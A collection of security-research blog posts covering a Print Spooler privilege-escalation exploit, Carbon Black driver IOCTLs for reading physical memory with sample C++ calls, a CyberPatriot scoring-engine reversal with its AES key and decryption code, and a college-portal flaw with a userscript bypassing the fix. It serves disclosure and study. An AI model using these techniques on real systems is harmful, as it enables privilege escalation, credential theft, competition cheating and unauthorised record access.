  • Force the Spooler to restart to create the directory by loading AppVTerminator.dll into the Spooler
  • Write DLL into the new directory inside of the printer driver directory
  • Load the DLL into the Spooler

Remember that it is sufficient to create the driver directory only once in order to load as many DLLs as desired. There's no need to trigger the exploit multiple times; doing so will most likely end up killing the Spooler service indefinitely until a reboot brings it back up. When the driver directory has been created, it is possible to keep writing and loading DLLs from the directory without restarting the Spooler service. The exploit that can be found at the end of this post will check if the driver directory already exists, and if so, it will skip the creation of the directory and jump straight to writing and loading the DLL. The second run of the exploit can be seen below.

Second run of SpoolFool

The functional exploit and DLL can be found here: https://github.com/ly4k/SpoolFool.

Conclusion

That’s it. Microsoft has officially released a patch. When I initially found out that there was a check during the actual creation of the directory as well, I started looking into other interesting places to create a directory. I found this post by Jonas L from Secret Club, where the Windows Error Reporting Service (WER) is abused to exploit an arbitrary directory creation primitive. However, the technique didn’t seem to work reliably on my Windows 10 machine. The SplLoadLibraryTheCopyFileModule is very reliable however, but assumes that the user can manage a printer, which is already the case for this vulnerability.

Patch Analysis

[Feb 08, 2022]

A quick check with Process Monitor reveals that the SpoolDirectory is no longer created when the Spooler initializes. If the directory does not exist, the Print Spooler falls back to the default spool directory.

To be continued…

Disclosure Timeline

  • Nov 12, 2021: Reported to Microsoft Security Response Center (MSRC)
  • Nov 15, 2021: Case opened and assigned
  • Nov 19, 2021: Review and reproduction
  • Nov 22, 2021: Microsoft starts developing a patch for the vulnerability
  • Jan 21, 2022: The patch is ready for release
  • Feb 08, 2022: Patch is silently released. No acknowledgement or information received from Microsoft
  • Feb 09, 2022: Microsoft gives acknowledgement to me and Institut For Cyber Risk for CVE-2022-21999


Reading Physical Memory using Carbon Black's Endpoint driver

14 February 2019 at 15:22

Enterprises rely on endpoint security software in order to secure machines that have access to the enterprise network. Usually considered the next step in the evolution of anti-virus solutions, endpoint protection software can protect against various attacks such as an employee running a Microsoft Word document with macros and other conventional attacks against enterprises. In this article, I'll be looking at Carbon Black's endpoint protection software and the vulnerabilities attackers can take advantage of. Everything I am going to review in this article has been reported to Carbon Black and they have said it is not a real security issue because it requires Administrator privileges.

Driver Authentication

The Carbon Black driver (cbk7.sys) has a basic authentication requirement before accepting IOCTLs. After opening the "\\.\CarbonBlack" device, you must send "good job you can use IDA, you get a cookie\x0\x0\x0\x0\x0\x0\x0\x0" with the IOCTL code of 0x81234024.
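A minimal sketch of that handshake (device name and IOCTL code as recovered above; the helper name is mine):

#include <windows.h>

// Sketch: open cbk7.sys's device and send the hardcoded cookie string.
HANDLE OpenCarbonBlack()
{
    HANDLE hDevice = CreateFileA("\\\\.\\CarbonBlack", GENERIC_READ | GENERIC_WRITE,
                                 0, nullptr, OPEN_EXISTING, 0, nullptr);
    if (hDevice == INVALID_HANDLE_VALUE)
        return hDevice;

    // 42-character message; the zero-filled array supplies the trailing NULs.
    char cookie[50] = "good job you can use IDA, you get a cookie";
    DWORD ret = 0;
    if (!DeviceIoControl(hDevice, 0x81234024, cookie, sizeof(cookie),
                         nullptr, 0, &ret, nullptr)) {
        CloseHandle(hDevice);
        return INVALID_HANDLE_VALUE;
    }
    return hDevice;
}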

Setting Acquisition Mode

The acquisition mode is a value the driver uses to determine what method to take when reading physical memory; we'll get into this in the next section. To set the acquisition mode, an attacker must send the new acquisition value in the input buffer for the IOCTL 0x8123C144 as a uint32_t.

Physical Memory Read Access

The Carbon Black Endpoint Sensor driver has an IOCTL (0x8123C148) that allows you to read an arbitrary physical memory address. It gives an attacker three methods of reading physical memory:

  1. If Acquisition Mode is set to 0, the driver uses MmMapIoSpace to map the physical memory then copies the data.
  2. If Acquisition Mode is set to 1, the driver opens the "\Device\PhysicalMemory" section and copies the data.
  3. If Acquisition Mode is set to 2, the driver translates the physical address to a virtual address and copies that.

To read physical memory, you must send the following buffer:

struct PhysicalMemReadRequest {
  uint64_t ptrtoread; // The physical memory address you'd like to read.
  uint64_t bytestoread; // The number of bytes to read.
};

The output buffer size should be bytestoread.
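Putting the two IOCTLs together, a sketch that reuses the hypothetical OpenCarbonBlack helper from above:

#include <windows.h>
#include <cstdint>
#include <vector>

struct PhysicalMemReadRequest {
    uint64_t ptrtoread;   // physical address to read
    uint64_t bytestoread; // number of bytes to read
};

// Sketch: pick an acquisition mode, then read physical memory into `out`.
bool ReadPhysicalMemory(HANDLE hDevice, uint64_t physAddr, std::vector<uint8_t>& out)
{
    uint32_t mode = 0; // 0 = MmMapIoSpace (see the list above)
    DWORD ret = 0;
    if (!DeviceIoControl(hDevice, 0x8123C144, &mode, sizeof(mode),
                         nullptr, 0, &ret, nullptr))
        return false;

    PhysicalMemReadRequest req = { physAddr, out.size() };
    return DeviceIoControl(hDevice, 0x8123C148, &req, sizeof(req),
                           out.data(), (DWORD)out.size(), &ret, nullptr) != FALSE;
}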

CR3 Access

Carbon Black was nice enough to have another IOCTL (0x8123C140) that gives a list of known physical memory ranges (calls MmGetPhysicalMemoryRanges) and provides the CR3 register (Directory Base). This is great news for an attacker because it means they don't have to predict/bruteforce a directory base and instead can convert a physical memory address directly to a kernel virtual address with ease (vice-versa too!).

To call this IOCTL, you need to provide an empty input buffer and an output buffer with a minimum size of 0x938 bytes. To get the CR3, simply do *(uint64_t*)(outputbuffer).
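A similar hedged sketch for the CR3 query, under the same assumptions:

#include <windows.h>
#include <cstdint>

// Sketch: IOCTL 0x8123C140 returns the physical memory ranges and CR3.
uint64_t ReadDirectoryBase(HANDLE hDevice)
{
    uint8_t out[0x938] = {};
    DWORD ret = 0;
    if (!DeviceIoControl(hDevice, 0x8123C140, nullptr, 0,
                         out, sizeof(out), &ret, nullptr))
        return 0;
    return *reinterpret_cast<uint64_t*>(out); // CR3 is the first 8 bytes
}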

Impact

You might ask what's the big deal if you need administrator for this exploit. The issue I have is that the Carbon Black endpoint software will probably not be on an average home PC, but rather on corporate endpoints. If a company is willing to purchase software such as Carbon Black to protect their endpoints, they're probably taking other security measures too. This might include having a whitelisted driver system, secure boot, LSA Protection, etc. If an attacker gains administrator on the endpoint (e.g. if a parent process was elevated), then they could not only disable the protection of Carbon Black, but could use its driver to read sensitive information (like the memory of lsass.exe if LSA Protection is on). My point is, this vulnerability allows an attacker to use a whitelisted driver to access any memory on the system, most likely undetected by any anti-virus on the system. I don't know about you, but to me this is not something I'd accept from the software that's supposed to protect me.

The hash of the cbk7.sys driver is ec5b804c2445e84507a737654fd9aae8 (MD5) and 2afe12bfcd9a5ef77091604662bbbb8d7739b9259f93e94e1743529ca04ae1c3 (SHA256).

Reversing the CyberPatriot National Competition Scoring Engine

12 April 2019 at 22:10

Edit 4/12/2019


Originally, I published this post a month ago. After my post, I received a kind email from one of the primary developers for CyberPatriot asking that I take my post down until they could change their encryption algorithm. Given that the national competition for CyberPatriot XI was in a month, I decided to take the post down until after national competitions completed. National competitions ended yesterday, which is why I am re-publishing this write-up now.

Disclaimer

This article pertains to the competitions prior to 2018, as I have stopped participating in newer competitions and am therefore no longer subject to the competition's rule book. This information is meant for educational use only and as fair use commentary for the competition in past years.

Preface

CyberPatriot is the air force association's "national youth cyber education program". The gist of the competition is that competitors (teams around the nation) are given virtual machines that are vulnerable usually due to configuration issues or malicious files. Competitors must find and patch these holes to gain points.

The points are calculated by the CyberPatriot Scoring Engine, a program which runs on the vulnerable virtual machine and does routine checks on different aspects of the system that are vulnerable to see if they were patched.

I am a high school senior who participated in the competition in 2015-2016, 2016-2017, and 2017-2018, for a total of 3 years. The furthest my team got was regionals, though we once spent a good hour under the 12th-place cut-off for nationals. I did not participate this year because the organization that was hosting CyberPatriot teams, ours included, unfortunately stopped due to the learning curve.

This all started when I was cleaning up my hard drive to clear up some space. I found an old folder called "CyberPatriot Competition Images" and decided to take a look. In the years I was competing in CyberPatriot, I had some reversing knowledge, but it was nothing compared to what I can do today. I thought it would be a fun experiment to take a look at the most critical piece of the CyberPatriot infrastructure - the scoring engine. In this article, I'm going to be taking an in-depth look into the CyberPatriot scoring engine, specifically for the 2017-2018 (CyberPatriot X) year.

General Techniques

If all you wanted to do was see what the engine accesses, the easiest way would be to hook different Windows API functions such as CreateFileW or RegOpenKeyExA. The reason I wanted to go deeper is that hooking alone doesn't show what they're actually checking, which is the juicy data we want.

Reversing

When the Scoring Engine first starts, it initially registers service control handlers and does generic service status updates. The part we are interested in is when it first initializes.

Before the engine can start scanning for vulnerabilities, it needs to know what to check and where to send the results. The interesting part of the Scoring Engine is that this information is stored offline. This means everything the virtual machine will check is stored on disk and does not require an internet connection. This somewhat surprised me because storing the upload URL and other general information on disk makes sense, but storing what's going to be scored?

After initializing service related classes, the engine instantiates a class that will contain the parsed information from the local scoring data. Local scoring data is stored (encrypted) in a file called "ScoringResource.dat". This file is typically stored in the "C:\CyberPatriot" folder in the virtual machine.

The Scoring Data needs to be decrypted and parsed into the information class. This happens in a function I call "InitializeScoringData". At first, the function can be quite overwhelming due to its size. It turns out, only the first part does the decryption of the Scoring Data; the rest is just parsing through the XML (the Scoring Data is stored in XML format). The beginning of the "InitializeScoringData" function finds the path to the "ScoringResource.dat" file by referencing the path of the current module ("CCSClient.exe", the scoring engine, is in the same folder as the Scoring Data). For encryption and decryption, the Scoring Engine uses the Crypto++ library (version 5.6.2) with AES-GCM. After finding the name of the "ScoringResource.dat" file, the engine initializes the CryptContext for decryption.

Reversing the CyberPatriot National Competition Scoring Engine

The function above initializes the cryptographic context that the engine will later use for decryption. I opted to go with a screenshot to show how the AES Key is displayed in IDA Pro. The AES Key Block starts at Context + 0x4 and is 16 bytes. Following endianness, the key ends up being 0xB, 0x50, 0x96, 0x92, 0xCA, 0xC8, 0xCA, 0xDE, 0xC8, 0xCE, 0xF6, 0x76, 0x95, 0xF5, 0x1E, 0x99 starting at the *(_DWORD*)(Context + 4) to the *(_DWORD*)(Context + 0x10).

After initializing the cryptographic context, the Decrypt function will check that the encrypted data file exists and enter a function I call "DecryptData". This function is not only used for decrypting the Scoring Data, but also Scoring Reports.

The "DecryptData" function starts off by reading in the Scoring Data from the "ScoringResource.dat" file using the boost library. It then instantiates a new "CryptoPP::StringSink" and sets the third argument to be the output string. StringSink's are a type of object CryptoPP uses to output to a string. For example, there is also a FileSink if you want to output to a file. The "DecryptData" function then passes on the CryptContext, FileBuffer, FileSize, and the StringSink to a function I call "DecryptBuffer".

The "DecryptBuffer" function first checks that the file is greater than 28 bytes, if it is not, it does not bother decrypting. The function then instantiates a "CryptoPP::BlockCipherFinal" for the AES Class and sets the key and IV. The interesting part is that the IV used for AES Decryption is the first 12 bytes of the file we are trying to decrypt. These bytes are not part of the encrypted content and should be disregarded when decrypting the buffer. If you remember, the key for the AES decryption was specified in the initialize CryptoPP function.

After setting the key and IV used for the AES decryption, the function instantiates a "CryptoPP::ZlibDecompressor". It turns out that the Scoring Data is deflated with Zlib before being encrypted, thus to get the Scoring Data, the data must be inflated again. This Decompressor is attached to the "StreamTransformationFilter" so that after decryption and before the data is put into the OutputString, the data is inflated.

The function starts decrypting by pumping the correct data into different CryptoPP filters. AES-GCM verifies the hash of the file as you decrypt, which is why you'll hear me referring to the "HashVerificationFilter". The "AuthenticatedDecryptionFilter" decrypts and the "StreamTransformationFilter" allows the data to be used in a pipeline.

First, the function inputs the last 16 bytes of the file into the "HashVerificationFilter" and also the IV. Then, it inputs the file contents after the 12th byte into the "AuthenticatedDecryptionFilter" which subsequently pipes it into the "StreamTransformationFilter" which inflates the data on-the-go. If the "HashVerificationFilter" does not throw an error, it returns that the decryption succeeded.
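To make the whole pipeline concrete, here's a condensed sketch of the decryption as described above (my own reimplementation against the Crypto++ API; DecryptScoringData is my naming, and the key bytes are the ones recovered earlier):

#include <cryptopp/aes.h>
#include <cryptopp/gcm.h>
#include <cryptopp/filters.h>
#include <cryptopp/zlib.h>
#include <string>

using namespace CryptoPP;

// AES key recovered from the engine (see the key block above).
static const byte kKey[16] = { 0x0B, 0x50, 0x96, 0x92, 0xCA, 0xC8, 0xCA, 0xDE,
                               0xC8, 0xCE, 0xF6, 0x76, 0x95, 0xF5, 0x1E, 0x99 };

// fileData is the raw contents of ScoringResource.dat.
std::string DecryptScoringData(const std::string& fileData)
{
    // Layout: [12-byte IV][ciphertext][16-byte GCM tag].
    std::string iv   = fileData.substr(0, 12);
    std::string body = fileData.substr(12); // tag stays at the end (MAC_AT_END)

    GCM<AES>::Decryption dec;
    dec.SetKeyWithIV(kKey, sizeof(kKey),
                     reinterpret_cast<const byte*>(iv.data()), iv.size());

    std::string xml;
    // Decrypt + verify the tag, then inflate the zlib-compressed plaintext.
    StringSource ss(body, true,
        new AuthenticatedDecryptionFilter(dec,
            new ZlibDecompressor(new StringSink(xml))));
    return xml; // throws HashVerificationFailed on tampered data
}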

The output buffer now contains the XML Scoring Data. Here is the format it takes:

<?xml version="1.0" encoding="utf-8"?>
<CyberPatriotResource>
  <ResourceID></ResourceID>
  <Tier/>
  <Branding>CyberPatriot</Branding>
  <Title></Title>
  <TeamKey></TeamKey>
  <ScoringUrl></ScoringUrl>
  <ScoreboardUrl></ScoreboardUrl>
  <HideScoreboard>true</HideScoreboard>
  <ReadmeUrl/>
  <SupportUrl/>
  <TimeServers>
    <Primary></Primary>
    <Secondary>http://time.is/UTC</Secondary>
    <Secondary>http://nist.time.gov/</Secondary>
    <Secondary>http://www.zulutime.net/</Secondary>
    <Secondary>http://time1.ucla.edu/home.php</Secondary>
    <Secondary>http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime</Secondary>
    <Secondary>http://worldtime.io/current/utc_netherlands/8554</Secondary>
    <Secondary>http://www.timeanddate.com/worldclock/timezone/utc</Secondary>
    <Secondary>http://www.thetimenow.com/utc/coordinated_universal_time</Secondary>
    <Secondary>http://www.worldtimeserver.com/current_time_in_UTC.aspx</Secondary>
  </TimeServers>
  <DestructImage>
    <Before></Before>
    <After></After>
    <Uptime/>
    <Playtime/>
    <InvalidClient></InvalidClient>
    <InvalidTeam/>
  </DestructImage>
  <DisableFeedback>
    <Before></Before>
    <After></After>
    <Uptime/>
    <Playtime/>
    <NoConnection></NoConnection>
    <InvalidClient></InvalidClient>
    <InvalidTeam></InvalidTeam>
  </DisableFeedback>
  <WarnAfter/>
  <StopImageAfter/>
  <StopTeamAfter/>
  <StartupTime>60</StartupTime>
  <IntervalTime>60</IntervalTime>
  <UploadTimeout>24</UploadTimeout>
  <OnPointsGained>
    <Execute>C:\CyberPatriot\sox.exe C:\CyberPatriot\gain.wav -d -q</Execute>
    <Execute>C:\CyberPatriot\CyberPatriotNotify.exe You Gained Points!</Execute>
  </OnPointsGained>
  <OnPointsLost>
    <Execute>C:\CyberPatriot\sox.exe C:\CyberPatriot\alarm.wav -d -q</Execute>
    <Execute>C:\CyberPatriot\CyberPatriotNotify.exe You Lost Points.</Execute>
  </OnPointsLost>
  <AutoDisplayPoints>true</AutoDisplayPoints>
  <InstallPath>C:\CyberPatriot</InstallPath>
  <TeamConfig>ScoringConfig</TeamConfig>
  <HtmlReport>ScoringReport</HtmlReport>
  <HtmlReportTemplate>ScoringReportTemplate</HtmlReportTemplate>
  <XmlReport>ScoringData/ScoringReport</XmlReport>
  <RedShirt>tempfile</RedShirt>
  <OnInstall>
    <Execute>cmd.exe /c echo Running installation commands</Execute>
  </OnInstall>
  <ValidClient> <!-- Requirements for VM -->
    <ResourcePath>C:\CyberPatriot\ScoringResource.dat</ResourcePath>
    <ClientPath>C:\CyberPatriot\CCSClient.exe</ClientPath>
    <ClientHash></ClientHash>
    <ProductID></ProductID>
    <DiskID></DiskID>
    <InstallDate></InstallDate>
  </ValidClient>
  <Check>
    <CheckID></CheckID>
    <Description></Description>
    <Points></Points>
    <Test>
      <Name></Name>
      <Type></Type>
      <<!--TYPE DATA-->></<!--TYPE DATA-->> <!-- Data that is the specified type -->
    </Test>
    <PassIf>
      <<!--TEST NAME-->>
        <Condition></Condition>
        <Equals></Equals>
      </<!--TEST NAME-->>
    </PassIf>
  </Check>
  <Penalty>
    <CheckID></CheckID>
    <Description></Description>
    <Points></Points>
    <Test>
      <Name></Name>
      <Type></Type>
      <<!--TYPE DATA-->></<!--TYPE DATA-->> <!-- Data that is the specified type -->
    </Test>
    <PassIf>
      <<!--TEST NAME-->>
        <Condition></Condition>
        <Equals></Equals>
      </<!--TEST NAME-->>
    </PassIf>
  </Penalty>
  <AllFiles>
    <FilePath></FilePath>
    ...
  </AllFiles>
  <AllQueries>
    <Key></Key>
    ...
  </AllQueries>
</CyberPatriotResource>

The check XML elements tell you exactly what they check for. I don't have the Scoring Data for this year because I did not participate, but here are some XML Scoring Data files for past years:

2016-2017 CP-IX High School Round 2 Windows 8: Here

2016-2017 CP-IX High School Round 2 Windows 2008: Here

2016-2017 CP-IX HS State Platinum Ubuntu 14: Here

2017-2018 CP-X Windows 7 Training Image: Here

Tool to decrypt

This is probably what a lot of you are looking for, just drag and drop an encrypted "ScoringResource.dat" onto the program, and the decrypted version will be printed. If you don't want to compile your own version, there is a compiled binary in the Releases section.

Github Repo: Here

Continuing reversing

After the function decrypts the buffer of Scoring Data, the "InitializeScoringData" function parses through it and fills the information class with the data from the XML. "InitializeScoringData" is called only once, at the beginning of the engine.

From then on, until the service receives the STOP message, it constantly checks to see if a team patched a vulnerability. In the routine function, the engine checks if the scoring data was initialized/decrypted, and if it wasn't, decrypts it again. This is also when the second check is done to see whether or not the image should be destructed. The factors it checks include the time, the DestructImage object of the XML Scoring Data, etc.

If the function decides to destruct the image, it is quite amusing what it does...

Reversing the CyberPatriot National Competition Scoring Engine

The first if statement checks whether or not to destruct the image, and if it should destruct, it starts:

  • Deleting registry keys and the sub keys under them such as "SOFTWARE\\Microsoft\\Windows NT", "SOFTWARE\\Microsoft\\Windows", "SOFTWARE\\Microsoft", "SOFTWARE\\Policies", etc.
  • Deleting files in critical system directories such as "C:\\Windows", "C:\\Windows\\System32", etc.
  • Overwriting the first 200 bytes of your first physical drive with NULL bytes.
  • Terminating every process running on your system.

As you can see in the image, it strangely repeats these functions over and over again before exiting. I guess they're quite serious when they say don't try to run the client on your machine.

After checking whether or not to destroy a system, it checks to see if the system is shutting down. If it is not, then it enters a while loop which executes the checks from the Scoring Data XML. It does this in a function I call "ExecuteCheck".

The function "ExecuteCheck" essentially loops every pass condition for a check and executes the check instructions (i.e C:\trojan.exe Exists Equals true). I won't get into the nuances of this function, but this is an important note if you want to spoof that the check passed. The check + 0x54 is a byte which indicates whether or not it passed. Set it to 1 and the engine will consider that check to be successful.

After executing every check, the engine calls a function I call "GenerateScoringXML". This function takes in the data from the checks and generates an XML file that will be sent to the scoring server. It loops each check/penalty and checks the check + 0x54 byte to see if it passed. This XML is also stored in encrypted data files under "C:\CyberPatriot\ScoringData\*.dat". Here is what a scoring XML looks like (you can use my decrypt program on these data files too!):

<?xml version="1.0" encoding="utf-8"?>
<CyberPatriot>
  <ResourceID></ResourceID>
  <TeamID/>
  <Tier/>
  <StartTime></StartTime>
  <VerifiedStartTime></VerifiedStartTime>
  <BestStartTime></BestStartTime>
  <TeamStartTime/>
  <ClientTime></ClientTime>
  <ImageRunningTime></ImageRunningTime>
  <TeamRunningTime></TeamRunningTime>
  <Nonce></Nonce>
  <Seed></Seed>
  <Mac></Mac>
  <Cpu></Cpu>
  <Uptime></Uptime>
  <Sequence>1</Sequence>
  <Tampered>false</Tampered>
  <ResourcePath>C:\CyberPatriot\ScoringResource.dat</ResourcePath>
  <ResourceHash></ResourceHash>
  <ClientPath>C:\CyberPatriot\CCSClient.exe</ClientPath>
  <ClientHash></ClientHash>
  <InstallDate></InstallDate>
  <ProductID></ProductID>
  <DiskID></DiskID>
  <MachineID></MachineID>
  <DPID></DPID>
  <Check>
    <CheckID></CheckID>
    <Passed>0</Passed>
  </Check>
  <Penalty>
    <CheckID></CheckID>
    <Passed>0</Passed>
  </Penalty>
  <TotalPoints>0</TotalPoints>
</CyberPatriot>

After generating the Scoring XML, the program calls a function I call "UploadScores". Initially, this function checks internet connectivity by trying to reach Google, the first CyberPatriot scoring server, and the backup CyberPatriot scoring server. The function uploads the scoring XML to the first available scoring server using curl. This function does integrity checks to see if the score XML is incomplete or if there is proxy interception.

After the scoring XML has been uploaded, the engine updates the "ScoringReport.html" to reflect the current status such as internet connectivity, the points scored, the vulnerabilities found, etc.

Finally, the function ends with updating the README shortcut on the Desktop with the appropriate link specified in the decrypted "ScoringResource.dat" XML and calling "DestructImage" again to see if the image should destruct or not. If you're worried about the image destructing, just hook it and return 0.

Conclusion

In conclusion, the CyberPatriot Scoring Engine is really not that complicated. I hope that this article clears up some of the myths and unknowns associated with the engine and gives you a better picture of how it all works. No doubt CyberPatriot will change how they encrypt/decrypt for next year's CyberPatriot, but I am not sure to what extent they will change things.

If you're wondering how I got the "ScoringResource.dat" files from older VM images, there are several methods:

  • VMWare has an option under File called "Map Virtual Disks". You can give it a VMDK file and it will map it for you as a drive. You can grab the file from the filesystem there.
  • 7-Zip can extract VMDK files.
  • If you want to run the VM, you can set your system time to be the time the competition was and turn off networking for the VM. No DestructImage :)

Hacking College Admissions

13 April 2019 at 14:13

Getting into college is one of the more stressful times of a high school student's life. Since the admissions process can be quite subjective, students have to consider a variety of factors to convince the admissions officers that "they're the one". Some families do as much as they can to improve their chances - even going as far as trying to cheat the system. For wealthier families, this might be donating a very large amount to the school or, as we've heard in the news recently, bribing school officials.

If you don't know about me already, I'm a 17-year-old high school senior who has an extreme interest in the information security field and was part of the college admissions process this year. Being part of the college admissions process made me interested in investigating, "Can you hack yourself into a school?". In this article, I'll be looking into TargetX, a "Student Lifecycle Solution for Higher Education" that serves several schools. All of this research was driven by my genuine interest in security, not because I wanted to get into a school through malicious means.

Investigation

The school I applied to that was using TargetX was the Worcester Polytechnic Institute in Worcester, Massachusetts. After submitting my application on the Common App, an online portal used to apply to hundreds of schools, I received an email to register on their admissions portal. The URL was the first thing that jumped out at me: https://wpicommunity.force.com/apply. Force.com reminded me of Salesforce, and at first I didn't think Salesforce did college admissions portals. Visiting force.com brought me to the product page for their "Lightning Platform" software. It looked like a website-building system for businesses. I thought the college might have made their own system, but when I looked at the source of the registration page, it referred to something else called TargetX. This is how I found out that TargetX was simply using Salesforce's "Lightning Platform" to create a college admissions portal.

After registering, I started to analyze what was being accessed. At the same time, I was considering that this was a Salesforce Lightning Platform. First, I found that their REST API hinged on a route called "apexremote", which turned out to be Salesforce's way of exposing classes to clients through REST. Here is the documentation for that. Fortunately, WPI had configured it correctly so that you could only access APIs that you were supposed to access, and it was pretty shut down. I thought about other APIs Salesforce might expose and found out they had a separate REST/SOAP API too. In WPI's case, they did a good job restricting this API from student users, but in general this is a great attack vector (I found this API exposed on a different Salesforce site).

After digging through several JavaScript files and learning more about the platform, I found out that Salesforce had a user interface backend system. I decided to try to access it, so I requested a random URL: /apply/_ui/search/ui/aaaaa. This resulted in a page that looked like this:

Hacking College Admissions

It looked like a standard 404 page. What caught my eye was the search bar on the top right. I started playing around with the values and found out it supported basic wildcards. I typed my name and used an asterisk to see if I could find anything.

Hacking College Admissions

Sorry for censoring, but the details included some sensitive information. It seemed as though I could access my own "Application Form" and contact. I was not able to access the applications of any other students, which was a relief, but it soon turned out that just being able to access my own application was severe enough.

After clicking on my name in the People section, I saw that there was an application record assigned to me. I clicked on it and then it redirected me to a page with a significant amount of information.

Hacking College Admissions

Here's a generalized list of everything I was able to access:

General application information
Decision information (detailed list of different considered factors)
Decision dates
Financial Aid information
GPA
Enrollment information
Decision information (misc. options i.e to show decision or not)
Recommendations (able to view them)
SAT / ACT Scores
High school transcript
Personal statement
Application fee

Here's where it gets even worse: I could edit everything I just listed above. For example:

Hacking College Admissions

Don't worry, I didn't accept myself into any schools or make my SAT Scores a 1600.

Initial contact

After finding this vulnerability, I immediately reached out to WPI's security team the same day to let them know about the vulnerabilities I found. They were very receptive and within a day they applied their first "patch". Whenever I tried accessing the backend panel, I would see my screen flash for a quick second and then a 404 Message popped up.

Hacking College Admissions

The flash had me interested; upon reading the source code of the page, I found all the data still there! I was very confused and diff'd the source code with an older copy I had saved. This is the JavaScript block that got added:

if (typeof sfdcPage != 'undefined') {
    if (window.stop) {
        window.stop();
    } else {
        document.execCommand("Stop");
    }
    /*lil too much*/
    if (typeof SimpleDialog != 'undefined') {
        var sd = new SimpleDialog("Error" + Dialogs.getNextId(), false);
        sd.setTitle("Error");
        sd.createDialog();
        window.parent.sd = sd;
        sd.setContentInnerHTML("<p align='center'><img src='/img/msg_icons/error32.png' style='margin:0 5px;'/></p><p align='center'>404 Page not found.</p><p align='center'><br /></p>");
        sd.show();
    }
    document.title = "Error 404";
}

This gave me a good chuckle. What they were doing was stopping the page from loading and then replacing the HTML with a 404 error. I could just use NoScript, but I decided to create a simple userscript to disable their tiny "fix".

(function() {
    'use strict';

    if(document.body.innerHTML.includes("404 Page not found.")) {
        window.stop();
        const xhr = new XMLHttpRequest();
        xhr.open('GET', window.location.href);
        xhr.onload = () => {
            var modified_html = xhr.responseText
            .replace(/<script\b[\s\S]*?<\/script>/g, s => {
                if (s.includes("lil too much"))
                    return ""; // Return nothing for the script content
                return s;
            });
            document.open();
            document.write(modified_html);
            document.close();
        };
        xhr.send();
    }
})();

Basically, this userscript will re-request the page, remove any "404" script blocks, and then set the current page to the updated HTML. It worked great and bypassed their fix. As suspected, WPI had only put a "band aid over the issue" to stop any immediate attacks. What I later learned when looking at some other schools was that TargetX themselves added the script under the name "TXPageStopper" - this wasn't just WPI's fix.

It's important to note that if you tried this today, sure the 404 page would be removed, but nothing is accessible. They've had this patch since January and after doing a real patch to fix the actual issue, they just never removed the 404 page stopper.

Remediation?

This is going to be a small section about my interactions with WPI after sending them the vulnerability details. I first found and reported this vulnerability back in January, specifically the third. WPI was very responsive (often replied within hours). I contacted them on February 14th again asking how the vulnerability patch was going and whether or not this was a vulnerability in only WPI or it was a vulnerability in TargetX too. Again within an hour, WPI responded saying that they have fixed the issues and that they had a "final meeting set up for the incident review". They said, "It was a combination of a TargetX vulnerability as well as tightening up some of our security settings".

I immediately (within 8 minutes) replied to their email asking for the TargetX side of the vulnerability to apply for a CVE. This is when things turned sour. Five days passed and there was no reply. I sent a follow-up email to check in. I sent another follow-up the next week and the week after that. Complete radio silence. By March 16th, I decided to send a final email letting them know that I intended to publish about the vulnerability that week, but this time I CC'd the boss of the person I was in contact with.

Within a day, on a Sunday, the boss replied saying that they had not been aware that I was waiting on information. This is specifically what that email said:

We will reach out to TargetX tomorrow and determine and confirm the exact details of what we are able to release to you. I will be in touch in a day or two with additional information once we have talked with TargetX. We would prefer that you not release any blog posts until we can follow-up with TargetX. Thank you.

Of course, if the vulnerability had not been completely patched yet, I did not want to bring any attention to it. I sent back an email thanking them and saying that I looked forward to hearing back.

A week passed. I sent a follow-up email asking about the status of things. No response. I sent another follow-up the next week, and this time I mentioned that I again was planning to publish. Radio silence.

It has been about a week since I sent that email. Because I have had no response, because they had said the vulnerability was patched, and because I could not extract any more data, I decided to publish.

Other schools impacted

I named this post "Hacking College Admissions" because this vulnerability was not just in WPI. Besides WPI confirming this to me themselves, I found similar vulnerabilities in other schools that were using the TargetX platform.

To find other schools impacted, I found all of the subdomains of force.com and tried to find universities. I am sure I missed some schools, but this is a small list of the other schools affected.

Antioch University
Arcadia University
Averett University
Bellevue University
Berklee College of Music
Boston Architechtural College
Boston University
Brandman University
Cabrini University
California Baptist University
California School Of The Arts, San Gabriel Valley
Cardinal University
City Year
Clarion University of Pennsylvania
Columbia College
Concordia University, Irvine
Concordia University, Montreal
Concordia University, Oregon
Concordia University, Texas
Delaware County Community College
Dominican University
ESADE Barcelona
East Oregon University
Eastern University
Embry-Riddle Aeronautical University
Fashion Institute of Design & Merchandising
George Mason University
George Washington University
Grove City College
Harvard Kennedy School
Hood College
Hope College
Illinois Institute of Technology
International Technological University
Johnson & Wales University
Keene State College
Laguna College
Lebanon Valley College
Lehigh Carbon Community College
London School of Economics and Political Science
Mary Baldwin University
Master's University
Morovian College
Nazareth College
New York Institute of Technology
Oregon State University
Pepperdine University
Piedmont College
Plymouth State University
Regis College
Saint Mary's University of Minnesota
Simpson University
Skagit Valley College
Summer Discovery
Texas State Technical College
Townson University
USC Palmetto College
University of Akron
University of Arizona, Eller MBA
University of California, Davis
University of California, San Diego
University of California, Santa Barbara
University of Dayton
University of Houston
University of Maine
University of Michigan-Dearborn
University of Nevada, Reno
University of New Hampshire
University of New Haven
University of Texas, Dallas
University of Virginia
University of Washington
University of Alabama, Birmingham
West Virginia University
Western Connecticut University
Western Kentucky University
Western Michigan University
Wisconsin Indianhead Technical College
Worcester Polytechnic Institute
Wright State University

There are some schools that appeared to be running on the same Salesforce platform but on a custom domain, which is probably why I missed some schools.

Conclusion

It turns out, having lots of money isn't the only way to get into your dream college, and yes, you can "hack yourself into a school". The scary part about my findings was that WPI, at least, had been vulnerable since they implemented the Salesforce system in 2012. Maybe students should be taking a better look at the systems around them, because all I can imagine is someone finding something like this and using it to cheat the system.

I hope you enjoyed the article and feel free to message me if you have any questions.

Remote Code Execution on most Dell computers

30 April 2019 at 12:52

What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is "What third-party software came with my PC?". In this article, I'll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to "proactively check the health of your system’s hardware and software" and which is "preinstalled on most of all new Dell devices".

Discovery

Back in September, I was in the market for a new laptop because my 7-year-old MacBook Pro just wasn't cutting it anymore. I was looking for an affordable laptop that had the performance I needed, and I decided on Dell's G3 15 laptop. I upgraded my laptop's 1-terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell's support site, I was prompted with an interesting option.

Remote Code Execution on most Dell computers

